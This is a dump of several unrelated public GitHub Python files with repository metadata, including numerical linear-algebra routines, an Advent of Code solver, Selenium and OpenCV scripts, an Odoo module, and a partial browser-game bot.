Parameters\n ----------\n a : [[float, float, ...],\n [float, float, ...],\n ...]\n Матрица, введенная пользователем\n\n\n \"\"\"\n for i in range(len(a)): \n print(f'{a[i]}') \n\ndef det(a):\n \"\"\"\n Функция вычисляет определитель матрицы.\n\n Parameters\n ----------\n a : [[float, float, ...],\n [float, float, ...],\n ...]\n Матрица, определитель которой нужно вычислить.\n\n Raises\n ------\n ValueError\n Возникает, если введённая матрица a не квадратная\n\n Returns\n -------\n summ : float\n Определитель матрицы\n\n \"\"\"\n if len(a) != len(a[0]):\n raise ValueError('Матрица должна быть квадратная') \n for i in range(len(a)):\n summ = 0\n if len(a) == 1:\n summ += a[0][0]\n return summ\n else:\n for k in range(len(a)):\n b = copy.deepcopy(a)\n b.pop(0)\n for j in range(len(b)):\n b[j].pop(k)\n summ += det(b)*((-1)**k)*int(a[0][k])\n return summ\n \n \ndef matrix_of_coefficients_is_square(a):\n \"\"\"\n Функция показывает, является ли матрица квадртной.\n\n Parameters\n ----------\n a : [[float, float, ...],\n [float, float, ...],\n ...]\n Матрица, введенная пользователем\n\n Returns\n -------\n bool\n True - если матрица квадратная; \n False - иначе\n\n \"\"\"\n if len(a)+1 == len(a[0]):\n return True \n return False\n\ndef norma(matr):\n \"\"\"\n Функция вычисляет бесконечную норму матрицы.\n\n Parameters\n ----------\n matr : [[float, float, ...],\n [float, float, ...],\n ...]\n Матрица, введенная пользователем\n\n Returns\n -------\n float\n Максимальная из сумм всех столбцов - норма матрицы\n\n \"\"\"\n matr = np.array(matr)\n return matr.sum(axis=0).max()\n\n\n\ndef ab(matr):\n \"\"\"\n Функция разбивает введенную пользователем матрицу на две.\n\n Parameters\n ----------\n matr : [[float, float, ...],\n [float, float, ...],\n ...]\n Матрица, введенная пользователем\n\n Returns\n -------\n a : [[float, float, ...],\n [float, float, ...],\n ...]\n Квадратная матрица - левая часть введенной\n b : [float, float, ...]\n Правый столбец введенной матрицы\n\n \"\"\"\n a = []\n b = []\n for i in range(len(matr)):\n a.append([])\n for j in range(len(matr[0])-1):\n a[i].append(matr[i][j])\n for i in range(len(matr)):\n b.append(matr[i][len(matr)])\n return a,b\n\n\n\ndef fix_diagonal(A):\n \"\"\"\n Функция преобразовывает матрицу таким образом, чтобы на главной диагонали не было нулей.\n\n Parameters\n ----------\n A : [[float, float, ...],\n [float, float, ...],\n ...]\n Матрица, введённая пользователем\n\n Returns\n -------\n A : [[float, float, ...],\n [float, float, ...],\n ...]\n Преобразованная матрица A без 0 на главной диагонали\n\n \"\"\"\n for i in range(len(A)):\n if (A[i][i] == 0):\n for j in range(len(A)):\n if A[j][i] != 0:\n for k in range(len(A) + 1):\n A[i][k] -= A[j][k]\n break\n return A\n\n\n\ndef iakobi(A):\n \"\"\"\n Функция находит решение системы линейных уравнений методом Якоби.\n\n Parameters\n ----------\n A : [[float, float, ...],\n [float, float, ...],\n ...]\n Матрица, введённая пользователем\n\n Returns\n -------\n A: [[float, float, ...],\n [float, float, ...],\n ...]\n Матрица коэффициентов изначальной матрицы A\n x: [float, float, ...]\n Список решений системы\n [[float, float, ...],\n [float, float, ...],\n ...]\n Обратная матрица для матрицы A\n \n \"\"\" \n B = []\n for i in range(len(A)):\n B.append([])\n B[i].append(A[i][-1])\n\n B1 = []\n for i in range(len(A)):\n B1.append(A[i][-1])\n for i in range(len(A)):\n A[i].pop(-1)\n tempx = [0 for i in range(len(A))]\n e = float(input('Введите эпсилон: '))\n x=[0 for i in range(0,len(A))]\n flag = True\n count = 0 \n while flag == True or count>100:\n for i in range(len(A)): \n tempx[i] = B1[i]\n count +=1\n for j in range(len(A[i])):\n if i!=j:\n count +=1\n tempx[i] -= A[i][j]*x[j]\n tempx[i]/=A[i][i]\n count +=1\n flag = False\n for k in range(len(A)):\n if abs(x[k]-tempx[k])>=e:\n flag = True\n x[k] = tempx[k]\n if count > 100:\n break\n else:\n return A, x, np.linalg.inv(A), False\n\n return A, x, np.linalg.inv(A), True\n\n\n\ndef jdmethod(a, b):\n \"\"\"\n Функция находит решение системы линейных уравнений методом Жордана-Гаусса.\n\n Parameters\n ----------\n a : [[float, float, ...],\n [float, float, ...],\n ...]\n Квадратная матрица - левая часть изначальной\n b : [float, float, ...]\n Правый столбец изначальной матрицы\n\n Returns\n -------\n b : [float, float, ...]\n Список решений системы\n a_orig : [[float, float, ...],\n float, float, ...],\n ...]\n Изначальная квадратная матрица\n\n \"\"\"\n a = np.array(a, float)\n a_orig = copy.deepcopy(a)\n b = np.array(b, float)\n n = len(b)\n for k in range(n):\n if np.fabs(a[k,k]) < 1.0e-12:\n for i in range(k+1,n):\n if np.fabs(a[i,k]) > np.fabs(a[k,k]):\n for j in range(k,n):\n a[k,j],a[i,j] = a[i,j],a[k,j]\n b[k],b[i] = b[i],b[k]\n break\n pivot = a[k,k]\n for j in range(k,n):\n a[k,j] /= pivot\n b[k] /= pivot\n for i in range(n):\n if i == k or a[i,k] == 0: continue\n factor = a[i,k]\n for j in range(k,n):\n a[i,j] -= factor * a[k,j]\n b[i] -= factor * b[k]\n \n return b, a_orig\n\n\n\ndef linang_inv_jdmethod(a):\n \"\"\"\n Функция находит обратную матрицу для введённой с помощью метода Жордана-Гаусса.\n\n Parameters\n ----------\n a : [[float, float, ...],\n [float, float, ...],\n ...]\n Изначальная матрица\n\n Returns\n -------\n [[float, float, ...],\n [float, float, ...],\n ...]\n Обратная матрица для введённой\n\n \"\"\"\n a = np.array(a, float)\n e = np.eye(len(a))\n a = np.concatenate((a, e), axis=1)\n n = len(a)\n m = len(a[0])\n for k in range(n):\n if np.fabs(a[k,k]) < 1.0e-12:\n for i in range(k+1,n):\n if np.fabs(a[i,k]) > np.fabs(a[k,k]):\n for j in range(k,m):\n a[k,j],a[i,j] = a[i,j],a[k,j]\n break\n\n pivot = a[k,k]\n for j in range(k,m):\n a[k,j] /= pivot\n\n for i in range(n):\n if i == k or a[i,k] == 0: continue\n factor = a[i,k]\n for j in range(k,m):\n a[i,j] -= factor * a[k,j]\n\n return a[:, n:]\n\n\n\ndef fraction_jbmethod(a):\n \"\"\"\n Функция находит решение системы линейных уравнений методом Жордана-Гаусса,\n используя тип данных fraction\n\n Parameters\n ----------\n a : [[float, float, ...],\n [float, float, ...],\n ...]\n Изначальная матрица\n\n Returns\n -------\n x :[float, float, ...]\n Список решений системы\n\n \"\"\"\n # Создание массива numpy размера n и инициализация нулем для хранения вектора решения\n n = len(a)\n x = np.zeros(n)\n\n # Чтение коэффициентов расширенной матрицы\n for i in range(n):\n for j in range(n+1):\n a[i][j] = Fraction(a[i][j])\n\n # Применение Метода Жордана-Гаусса\n for k in range(n):\n if np.fabs(a[k,k]) < 1.0e-12:\n for i in range(k+1,n):\n if np.fabs(a[i,k]) > np.fabs(a[k,k]):\n for j in range(k,n+1):\n a[k,j],a[i,j] = a[i,j],a[k,j]\n break\n\n for j in range(n):\n if k != j:\n ratio = a[j][k]/a[k][k]\n\n for l in range(n+1):\n a[j][k] = a[j][l] - ratio * a[k][l]\n\n # Получе��ие решения\n for i in range(n):\n x[i] = a[i][n]/a[i][i]\n\n return x\n\n\ndef isdegenerate(A):\n \"\"\"\n Функция проверяет, есть ли решения у введённой системы уравнений.\n\n Parameters\n ----------\n A : [[float, float, ...],\n [float, float, ...],\n ...]\n Введённая матрица\n\n Returns\n -------\n bool\n False - матрица не является вырожденной, корни есть.\n True - матрица вырожденная, либо не является квадратной, корней быть не может.\n\n \"\"\"\n # ВВОД МАТРИЦЫ И ПРОВЕРКА НА ВЫРОЖДЕННОСТЬ \n matr = np.array(A)\n \n DELTA = 0.01\n \n flag = True # решение существует\n if matrix_of_coefficients_is_square(matr):\n a = ab(matr)[0]\n numpy_det = np.linalg.det(a)\n if abs(numpy_det) <= DELTA:\n my_own_det = det(a)\n if abs(my_own_det) <= DELTA:\n flag = False\n else:\n flag = True\n else:\n flag = True\n \n if flag:\n return False\n else:\n return True #матрица вырожденная, единого решения не существует\n else:\n return True #Матрица коэффициентов не является квадратной","repo_name":"dthseemsbttr/numericmethodsdths","sub_path":"nummethvera/slau.py","file_name":"slau.py","file_ext":"py","file_size_in_byte":13681,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"10356078234","text":"from aocd import data\nfrom aocd.models import Puzzle\n\ndef atobit(ch)->int:\n return int(\"1\"+\"0\"*(ord(ch) - ord('a')), 2)\n\ndef countone(num:int)->int:\n str()\nclass Segments:\n def __init__(self, str):\n self.mapping = {}\n inputs = sorted(str[:-1].split(\" \"), key=lambda x:len(x))\n input_bitmap = [0]*10\n for index, input in enumerate(inputs):\n for ch in sorted(input):\n input_bitmap[index] += atobit(ch)\n self._gen_map(input_bitmap)\n\n def relocation(self, alphabet):\n bits = 0\n for ch in alphabet:\n bits |= atobit(ch)\n return self.mapping[bits]\n def alloc(self, bitmap, digit):\n self.mapping[bitmap] = digit\n \n def reverse_map(self, digit):\n return list(self.mapping.keys())[list(self.mapping.values()).index(digit)]\n def _gen_map(self, bitmap):\n self.mapping[bitmap[0]] = 1\n self.mapping[bitmap[1]] = 7\n self.mapping[bitmap[2]] = 4\n self.mapping[bitmap[-1]] = 8\n for len_5 in bitmap[3:6]:\n if len_5 & self.reverse_map(1) == self.reverse_map(1):\n self.mapping[len_5] = 3\n elif bin(len_5 & self.reverse_map(4))[1:].count('1') == 2:\n self.mapping[len_5] = 2\n else:\n self.mapping[len_5] = 5\n\n for len_6 in bitmap[6:9]:\n if len_6 & self.reverse_map(4) == self.reverse_map(4):\n self.mapping[len_6] = 9\n elif len_6 & self.reverse_map(1) == self.reverse_map(1):\n self.mapping[len_6] = 0\n else:\n self.mapping[len_6] = 6\n\npuzzle = Puzzle(year=2021, day=8)\ninput_str = puzzle.input_data\n# input_str=\"\"\"be cfbegad cbdgef fgaecd cgeb fdcge agebfd fecdb fabcd edb | fdgacbe cefdb cefbgd gcbe\n# edbfga begcd cbg gc gcadebf fbgde acbgfd abcde gfcbed gfec | fcgedb cgb dgebacf gc\n# fgaebd cg bdaec gdafb agbcfd gdcbef bgcad gfac gcb cdgabef | cg cg fdcagb cbg\n# fbegcd cbd adcefb dageb afcb bc aefdc ecdab fgdeca fcdbega | efabcd cedba gadfec cb\n# aecbfdg fbg gf bafeg dbefa fcge gcbea fcaegb dgceab fcbdga | gecf egdcabf bgf bfgea\n# fgeab ca afcebg bdacfeg cfaedg gcfdb baec bfadeg bafgc acf | gebdcfa ecba ca fadegcb\n# dbcfg fgd bdegcaf fgec aegbdf ecdfab fbedc dacgb gdcebf gf | cefg dcbef fcge gbcadfe\n# bdfegc cbegaf gecbf dfcage bdacg ed bedf ced adcbefg gebcd | ed bcgafe cdgba cbgef\n# egadfb cdbfeg cegd fecab cgb gbdefca cg fgcdab egfdb bfceg | gbdfcae bgc cg cgb\n# gcafb gcf dcaebfg ecagb gf abcdeg gaef cafbge fdbac fegbdc | fgae cfgab fg bagce\"\"\"\n\npart1_score = 0\npart2_score = 0\ndata = input_str.split(\"\\n\")\nfor d in data:\n outputs = d.split(\"|\")[1]\n seg = Segments(d.split(\"|\")[0])\n s = \"\"\n for output in outputs[1:].split(\" \"):\n out = seg.relocation(output)\n if out in [1,4,7,8]:\n part1_score += 1\n s += str(out)\n part2_score += int(s)\n\nprint(part1_score, part2_score)","repo_name":"Hacker-s-In-inTrusion/advent-of-code-solve","sub_path":"2021/ChoKyuWon/day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"27319527576","text":"import logging\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nimport Method_Module\n\nService_obj = Service(\"C:\\chromedriver.exe\")\ndriver = webdriver.Chrome(service=Service_obj)\ndriver.implicitly_wait(10)\ndriver.maximize_window()\ndriver.get(\"https://www.amazon.in/\")\n\nlogger = logging.getLogger(__name__)\nfilehandler = logging.FileHandler(\"Amazon_logfile.log\")\nformatter = logging.Formatter(\"%(asctime)s : %(levelname)s : %(name)s : %(message)s\")\nfilehandler.setFormatter(formatter)\nlogger.addHandler(filehandler)\nlogger.setLevel(logging.DEBUG)\n\n\ndef test_signin_verification():\n Method_Module.login(driver, logger) #-------sign in procedure---------\n Method_Module.account_verify(driver, logger) #------- account varification----------\n\n\ndef test_cart_itemdelete():\n Method_Module.cart_itemdelete(driver, logger) #------- add to cart check and delete previous items----------\n\n\ndef test_mobile_purchase():\n Method_Module.amazon_Home(driver, logger) #----- Amazon home page-----\n Method_Module.mobile(driver, logger) #----- Selection of mobile ------\n Method_Module.cart_productVerification(driver, logger) #------ Cart Product Verification-----\n","repo_name":"Shashank2se/Project1_Amazon_verify","sub_path":"test_Amazon.py","file_name":"test_Amazon.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"23600043226","text":"import cv2\nimport numpy as np\nprint(cv2.__version__)\ncount = 1\nfor index in range(1, 12):\n vidcap = cv2.VideoCapture('manato_card_raw_data_set/masato_%d.mp4' % index)\n success,image = vidcap.read()\n success = True\n\n fps = vidcap.get(cv2.CAP_PROP_FPS)\n est_video_length_minutes = round(1) # Round up if not sure.\n est_tot_frames = est_video_length_minutes * 24 * fps # Sets an upper bound # of frames in video clip\n\n n = 10 # Desired interval of frames to include\n # get frame by skip n frame\n desired_frames = n * np.arange(est_tot_frames) \n for i in desired_frames:\n if i%9==0:\n vidcap.set(1,i-1) \n success,image = vidcap.read(1) \n if success != True:\n break\n height, width = image.shape[:2] # image is an array of array of [R,G,B] values\n img_resize = cv2.resize(image, (width/5, height/5), interpolation = cv2.INTER_AREA)\n \n cv2.imwrite(\"data_sets/masato/masato%d.jpg\" % count , img_resize)\n count += 1\n\n # get frame by frame\n\n # while success:\n # height, width = image.shape[:2] # image is an array of array of [R,G,B] values\n # img_resize = cv2.resize(image, (width/5, height/5), interpolation = cv2.INTER_AREA)\n # cv2.imwrite(\"data_sets/kondo/kondo%d.jpg\" % count, img_resize) # save frame as JPEG file\n # success,image = vidcap.read()\n # print 'Read a new frame: ', success\n # count += 1\n\n vidcap.release()\n \n","repo_name":"Thoi-Duong/image_cutter_script","sub_path":"video_cuter.py","file_name":"video_cuter.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5516488635","text":"from odoo import api, fields, models\nfrom datetime import timedelta\nimport math\n\n\nclass AccountInvoiceLine(models.Model):\n _inherit = \"account.invoice.line\"\n\n def _prepare_membership_line(self, invoice, product, price_unit, line_id,\n qty=1.0):\n qty = int(math.ceil(qty))\n date_from = fields.Date.from_string(\n invoice.date_invoice or fields.Date.today())\n date_to = (product.product_tmpl_id._get_next_date(date_from, qty=qty) -\n timedelta(days=1))\n return {\n 'partner': invoice.partner_id.id,\n 'membership_id': product.id,\n 'member_price': price_unit,\n 'date': invoice.date_invoice or fields.Date.today(),\n 'date_from': fields.Date.to_string(date_from),\n 'date_to': fields.Date.to_string(date_to),\n 'state': 'waiting',\n 'account_invoice_line': line_id,\n }\n\n @api.multi\n def write(self, vals):\n \"\"\"Create before the lines of membership with variable period.\"\"\"\n memb_line_model = self.env['membership.membership_line']\n if any(x in vals for x in ['product_id', 'quantity', 'invoice_id']):\n for line in self:\n product = (\n self.env['product.product'].browse(vals['product_id']) if\n vals.get('product_id') else line.product_id)\n invoice = (\n self.env['account.invoice'].browse(vals['invoice_id']) if\n vals.get('invoice_id') else line.invoice_id)\n if (invoice.type == 'out_invoice' and\n product.membership and\n product.membership_type == 'variable'):\n quantity = float(vals.get('quantity', line.quantity))\n price_unit = vals.get('price_unit', line.price_unit)\n membership_vals = self._prepare_membership_line(\n invoice, product, price_unit, line.id, qty=quantity)\n if line.membership_lines:\n if len(line.membership_lines) > 1: # pragma: no cover\n # Remove all except last one,\n # only one membership line per invoice line\n line.membership_lines[:-1].unlink()\n # Update with changes\n line.membership_lines[0].write(membership_vals)\n else:\n # Create membership line\n memb_line_model.create(membership_vals)\n return super(AccountInvoiceLine, self).write(vals)\n\n @api.model\n def create(self, vals):\n price_unit = vals.get('price_unit', 0.0)\n line = super(AccountInvoiceLine, self).create(vals)\n if (line.invoice_id.type == 'out_invoice' and\n line.product_id.membership and\n line.product_id.membership_type == 'variable'):\n qty = float(line.quantity)\n membership_vals = self._prepare_membership_line(\n line.invoice_id, line.product_id, price_unit, line.id, qty=qty)\n # There's already the super line\n line.membership_lines[0].write(membership_vals)\n return line\n","repo_name":"decodio/oca12","sub_path":"membership_variable_period/models/account_invoice.py","file_name":"account_invoice.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"6990592330","text":"import cv2\nimport numpy as np\nfrom dataPath import DATA_PATH\n\nimg = cv2.imread(DATA_PATH+\"images/gaussian-noise.png\")\n\n# Check for invalid input\nif img is None:\n print(\"Could not open or find the image\")\n\n# diameter of the pixel neighbourhood used during filtering\ndia=15;\n\n# Larger the value the distant colours will be mixed together\n# to produce areas of semi equal colors\nsigmaColor=80\n\n# Larger the value more the influence of the farther placed pixels\n# as long as their colors are close enough\nsigmaSpace=80\n\n#Apply bilateralFilter\nresult = cv2.bilateralFilter(img, dia, sigmaColor, sigmaSpace)\n\ncv2.imshow(\"Original Image\", img)\ncv2.waitKey(0)\ncv2.imshow(\"Bilateral Blur Result\", result)\ncv2.waitKey(0)\n","repo_name":"mariamonzon/ComputerVisionOpenCV","sub_path":"4-ImageEnhancementFiltering/bilateralBlur.py","file_name":"bilateralBlur.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"4654077899","text":"from ..base import BaseCurrency\n\n__author__ = \"Artur Barseghyan\"\n__copyright__ = \"2021 Artur Barseghyan\"\n__license__ = \"GPL-2.0-only OR LGPL-2.1-or-later\"\n__all__ = (\"NIO\",)\n\n\nclass NIO(BaseCurrency):\n \"\"\"NIO - Nicaraguan córdoba.\"\"\"\n\n uid: str = \"NIO\"\n rate: int = 100\n","repo_name":"barseghyanartur/valuta","sub_path":"src/valuta/currencies/nio.py","file_name":"nio.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"50"} +{"seq_id":"26259436978","text":"#%%\nimport pandas as pd\nimport dvc.api\nfrom tqdm import tqdm\nfrom openai.embeddings_utils import get_embedding\nimport json\n\ndf = pd.concat([\n pd.read_csv('../../data/wish_attr_extract_label/appen/input_batch_processed/appen_product_attribution_batch1.csv'),\n pd.read_csv('../../data/wish_attr_extract_label/appen/input_batch_processed/appen_product_attribution_batch2.csv'),\n pd.read_csv('../../data/wish_attr_extract_label/appen/input_batch_processed/appen_product_attribution_batch3.csv'),\n])\n\ndf['text'] = 'Product Title: ' + df['title'].astype(str) + ' ; ' + 'Product Description: ' + df['product_description'].astype(str)\ndf['text'] = df['text'].apply(lambda x: x.replace('\\n', ' '))\n#%%\nengine = 'text-embedding-ada-002'\nwith open('appen_tolabel_product_attr_leftover.json', 'a') as f:\n for d in tqdm(df.to_dict('records')):\n try:\n i = {\n 'openai_embedding': get_embedding(d['text'], engine=engine),\n 'text': d['text'],\n 'product_id': d['product_id'],\n 'label_ordering': d['label_ordering']\n }\n f.write(json.dumps(i) + '\\n')\n except Exception as e:\n print(f\"text: {d['text']} ; exception: {e}\")","repo_name":"kpister/prompt-linter","sub_path":"data/scraping/repos/jiwen-wish~multitask-llm-rnd-test/datasets~notebooks~openai_embedding~write_appen_product_embedding_to_file.py","file_name":"datasets~notebooks~openai_embedding~write_appen_product_embedding_to_file.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"31760443935","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport os\nimport inspect\n\n\ndef remove_if_possible(file_name):\n if os.path.exists(file_name):\n os.remove(file_name)\n\n\ndef prompt_to_remove(file_name):\n prompt = 'We will remove \\'' + file_name + '\\' file, y/n?'\n confirm = ('y', 'yes')\n cancel = ('n', 'no')\n choice = confirm + cancel\n\n user_input = ''\n while not (user_input in choice):\n user_input = input(prompt).lower()\n\n if user_input in confirm:\n remove_if_possible(file_name)\n break\n elif user_input in cancel:\n break\n\n\ndef read_file_with_try(file_name):\n print('\\n---- from', inspect.currentframe().f_code.co_name)\n f = None\n try:\n f = open(file_name, 'r')\n print(f.read())\n except IOError as an_error:\n print(an_error)\n finally:\n if f:\n f.close()\n\n\ndef read_file_with_with(file_name):\n print('\\n---- from', inspect.currentframe().f_code.co_name)\n try:\n with open(file_name, 'r') as f:\n print(f.read())\n except IOError as an_error:\n print(an_error)\n\n\ndef create(file_name):\n try:\n f = open(file_name, 'x')\n f.write('Hello, World!')\n f.close()\n except IOError as an_error:\n print(an_error)\n finally:\n if f:\n f.close()\n\n\ndef update_to_multiple(file_name):\n print('\\nIn', inspect.currentframe().f_code.co_name)\n try:\n with open(file_name, 'w') as f:\n f.seek(0, os.SEEK_SET)\n\n numbers = ('One', 'Two', 'Three', 'Four', 'Five', 'Enh, this is multiple line file')\n string = ''\n for number in numbers:\n string = string + number\n if number != numbers[-1]:\n string = string + '\\n'\n\n f.writelines(string)\n except IOError as an_error:\n print(an_error)\n\n\ndef read_file_line(file_name):\n print('\\nIn', inspect.currentframe().f_code.co_name)\n try:\n with open(file_name) as file:\n print('---- read line ----')\n count = 3\n while count > 0:\n count -= 1\n\n print('current position', file.tell())\n print(file.readline())\n\n print()\n print('---- read lines default ----')\n print('current position', file.tell())\n print(file.readlines())\n\n hint = 10\n print('\\ncurrent position', file.tell())\n pos = os.SEEK_SET\n print('move to', pos, file.seek(0, os.SEEK_SET))\n print('read lines', hint)\n print(file.readlines(hint))\n except IOError as an_error:\n print(an_error)\n\n\ndef read_png_if_possible():\n print('\\nIn', inspect.currentframe().f_code.co_name)\n\n file_name = 'python.png'\n try:\n with open(file_name, 'r') as file:\n print('---- open as \\'r\\' mode ----')\n print(file.read())\n except (IOError, UnicodeDecodeError) as an_error:\n print(an_error)\n\n print()\n try:\n with open(file_name, 'rb') as file:\n print('---- open as \\'rb\\' mode ----')\n print(file.read())\n except (IOError, UnicodeDecodeError) as an_error:\n print(an_error)\n\n\n# main business logic\nFILE_NAME = 'test.txt'\n\n# try style\nremove_if_possible(FILE_NAME)\nread_file_with_try(FILE_NAME)\ncreate(FILE_NAME)\nread_file_with_try(FILE_NAME)\n\n# with style\nremove_if_possible(FILE_NAME)\nread_file_with_with(FILE_NAME)\ncreate(FILE_NAME)\nread_file_with_with(FILE_NAME)\n\n# multiple line\nupdate_to_multiple(FILE_NAME)\nread_file_with_with(FILE_NAME)\nread_file_line(FILE_NAME)\n\n\n# PNG file\nread_png_if_possible()\n\n# finish work\nprompt_to_remove(FILE_NAME)\n","repo_name":"stonewin540/python.python3-hello-world","sub_path":"IO/fileIO.py","file_name":"fileIO.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"21208609585","text":"from imageai.Detection import ObjectDetection\nimport os\nimport cv2\nexecution_path = os.getcwd()\n\ndetector = ObjectDetection()\ndetector.setModelTypeAsYOLOv3()\ndetector.setModelPath( os.path.join(execution_path , \"yolo.h5\"))\ndetector.loadModel()\n# detections = detector.detectObjectsFromImage(input_image=os.path.join(execution_path , \"images/img.jpg\"), output_image_path=os.path.join(execution_path , \"imagenew.jpg\"), minimum_percentage_probability=30)\n\n# for eachObject in detections:\n# print(eachObject[\"name\"] , \" : \", eachObject[\"percentage_probability\"], \" : \", eachObject[\"box_points\"] )\n# print(\"--------------------------------\")\n\nfor image_name in os.listdir(\"dataset3/casual\"):\n \n slot1 = cv2.imread(os.path.join(\"dataset3/casual\",image_name))\n print(os.path.join(\"dataset3/casual\",image_name))\n detections = detector.detectObjectsFromImage(\n input_image=os.path.join(execution_path,\"dataset3/casual\",image_name),\n output_image_path=os.path.join(execution_path, \"out.jpg\"))\n print(detections)\n if detections:\n c = 0\n for eachObject in detections:\n print(eachObject[\"name\"], \" : \", eachObject[\"percentage_probability\"])\n print(eachObject)\n if eachObject[\"name\"] == \"person\":\n box = eachObject[\"box_points\"]\n for k in range(len(box)):\n if box[k] < 0:\n box[k] = 0\n img = slot1[box[1]:box[3], box[0]:box[2]]\n cv2.imwrite(\"croped/train/informal2/{}-{}.jpg\".format(image_name,c),img)\n c += 1\n # cv2.imshow(\"window\", img)\n # cv2.waitKey(0) \n","repo_name":"aayushrai/Dress_Code_Monitoring_System","sub_path":"Dress_code_classifier_model/extractPedestrian.py","file_name":"extractPedestrian.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"42943675049","text":"import numpy as np \nimport torch\nfrom environment_and_agent_utils import getActionSpace, giveReward, honestPartiesCommit, updateStates, initStatesandAgents\n# Functions used by the main.py training loop\n\ndef run_iters(params, honest_curr_temperature, \n byz_curr_temperature, honest_policy, byz_policy, oneHotStateMapper, device):\n curr_ep_trajectory_logs = []\n satisfied_constraints = []\n epoch_honest_reward = 0\n epoch_byz_reward = 0\n\n hit_max_round_len = 0\n avg_round_len = 0\n\n for round_in_ep in range(params['rounds_per_epoch']):\n #run the environment. \n\n single_run_trajectory_log = dict()\n\n #initialize the values and which agents are byzantine. \n # agent_list is all agents, honest and byzantine are subsets. \n agent_list, honest_list, byzantine_list = initStatesandAgents(params, honest_policy, byz_policy)\n\n round_counter = 0\n #until honest parties commit values (simulation terminates)\n while not honestPartiesCommit(honest_list):\n # choose new actions: \n for agent in agent_list: \n if agent.isByzantine: \n curr_temperature = byz_curr_temperature\n else: \n curr_temperature = honest_curr_temperature\n\n if type(agent.committed_value) is int: # dont change to True! Either it is False or a real value. \n action, action_logprob = agent.action, None\n else:\n if round_counter>params['max_round_len']: # force the honest agents to commit to a value. \n action, action_logprob = agent.chooseAction(oneHotStateMapper, curr_temperature, device, forceCommit=True)\n else: \n action, action_logprob = agent.chooseAction(oneHotStateMapper, curr_temperature, device)\n \n # log the current state and action\n try: \n single_run_trajectory_log['Byz-'+str(agent.isByzantine)+'_agent-'+str(agent.agentID)].append( (round_counter, agent.state, action, action_logprob ))\n except: \n single_run_trajectory_log['Byz-'+str(agent.isByzantine)+'_agent-'+str(agent.agentID)] = [ (round_counter, agent.state, action, action_logprob) ]\n\n # resolve the new states: \n #for agent in agent_list: \n updateStates(params, agent_list)\n\n # keep making more actions, storing all \n # of them along with the states and rewards\n if round_counter> params['max_round_len']:\n hit_max_round_len +=1\n\n round_counter+=1\n\n avg_round_len += round_counter\n\n # upon termination, calculate the terminal reward:\n # currently just checking if the agents satisfied consistency and validity\n # recieves a tuple of the form honest reward, byzantine reward\n reward, satisfied_constraints_this_iter = giveReward(params, honest_list, single_run_trajectory_log)\n\n epoch_honest_reward += reward[0]\n epoch_byz_reward += reward[1]\n #print('reward for iter:', reward)\n\n # storing in loggers\n satisfied_constraints.append(satisfied_constraints_this_iter)\n single_run_trajectory_log['reward'] = reward\n curr_ep_trajectory_logs.append(single_run_trajectory_log)\n\n #total_trajectory_logs.append(curr_ep_trajectory_logs[-1] )\n \n return curr_ep_trajectory_logs, satisfied_constraints, epoch_honest_reward, epoch_byz_reward, hit_max_round_len, avg_round_len\n\ndef temp_annealer(params, honest_curr_temperature, byz_curr_temperature):\n if params['use_heat_jumps']:\n honest_curr_temperature = honest_curr_temperature*params['temp_anneal'] # anneal the temperature for selecting actions over time. \n if honest_curr_temperatureparams['temp_fix_point']: # only decrease temp if it is above threshold\n honest_curr_temperature = honest_curr_temperature*params['temp_anneal']\n if byz_curr_temperature>params['temp_fix_point']:\n byz_curr_temperature=byz_curr_temperature*params['temp_anneal']\n return honest_curr_temperature, byz_curr_temperature\n\n","repo_name":"TrentBrick/LearningConsensus","sub_path":"train_funcs.py","file_name":"train_funcs.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"18814797303","text":"# -*- coding: utf-8 -*-\nimport sys\nimport traceback\nfrom multiprocessing import freeze_support\n\nfrom fastflix.entry import main\n\n\ndef start_fastflix():\n exit_code = 2\n portable_mode = True\n try:\n from fastflix import portable\n except ImportError:\n portable_mode = False\n\n if portable_mode:\n print(\"PORTABLE MODE DETECTED: now using local config file and workspace in same directory as the executable\")\n\n try:\n exit_code = main(portable_mode)\n except Exception:\n traceback.print_exc()\n input(\n \"Error while running FastFlix!\\n\"\n \"Plese report this issue on https://github.com/cdgriffith/FastFlix/issues (press any key to exit)\"\n )\n except KeyboardInterrupt:\n pass\n finally:\n sys.exit(exit_code)\n\n\nif __name__ == \"__main__\":\n freeze_support()\n start_fastflix()\n","repo_name":"cdgriffith/FastFlix","sub_path":"fastflix/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":967,"dataset":"github-code","pt":"50"} +{"seq_id":"29264936202","text":"from PIL import ImageGrab, ImageOps\nimport pyautogui\nimport time\nimport numpy as np\nimport os\n\n#os.system('chrome://dino/')\n\ndef jump():\n global run_time\n #waitDown = 0.200 - 1.05 ** run_time / 1000\n #if waitDown < 0.05:\n # waitDown = 0.05\n #print(waitDown, end=' ')\n\n pyautogui.keyUp('down')\n pyautogui.keyDown('space')\n while look() < basic:\n pass\n print('jump')\n 